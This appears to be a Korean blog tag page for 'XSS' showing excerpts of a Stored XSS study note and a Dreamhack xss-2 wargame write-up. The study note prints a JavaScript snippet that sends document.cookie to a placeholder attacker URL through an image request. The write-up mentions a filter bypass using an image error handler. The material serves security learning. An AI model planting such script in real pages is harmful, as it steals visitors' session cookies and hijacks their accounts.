XSS

Security/Study

[6주차] Stored XSS

XSS XSS(클라이언트 사이드 취약점)은 웹 페이지의 이용자를 대상으로 공격할 수 있는 취약점이다. 해당 종류의 취약점을 통해 이용자를 식별하기 위한 세션 및 쿠키 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있다. ** Server Side vs Client Side -> 서버에서 실행되는 코드 -> 클라이언트 측에서 실행되는 코드(웹 브라우저) HTML, css, javascript ** WEB Request var i = new Image(); i.src = "attack URL?cookie=" + document.cookie; -> 클라이언트 측 코드를 삽입하는 공격 -> 피해자 컴퓨터 (웹 브라우저) 실행되게 만드는 공격 > 클라이언트는 이미지를 불러오는 과정에서 javascript..

Security/Wargame

[dreamhack] xss-2

문제 정보 여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다. XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다. 문제 사이트에 들어가면 xss-1 문제와 같은 페이지가 나온다. 같은 문제인가 싶어 xss-1과 같은 xss를 삽입 했지만 풀리진 않았다. vuin(xss) page에 들어가면 xss-1과 달리 /vuln?param=이 실행 안되는 모습을 볼 수 있다. xss필터링을 걸어놓은 것 같다. 이걸 우회하는게 이번 xss-2 문제인 것 같다. xss 우회법을 구글링해서 찾아봐서 몇 가지를 알아냈다. 태그에 오류가 있을 경우, alert(1)를 실행한다. 이미지 주소에 임의의 값을 줌으로써 오류가 나게 하고, 그로 인해 alert 함수가 동..

brains88
'XSS' 태그의 글 목록
상단으로

티스토리툴바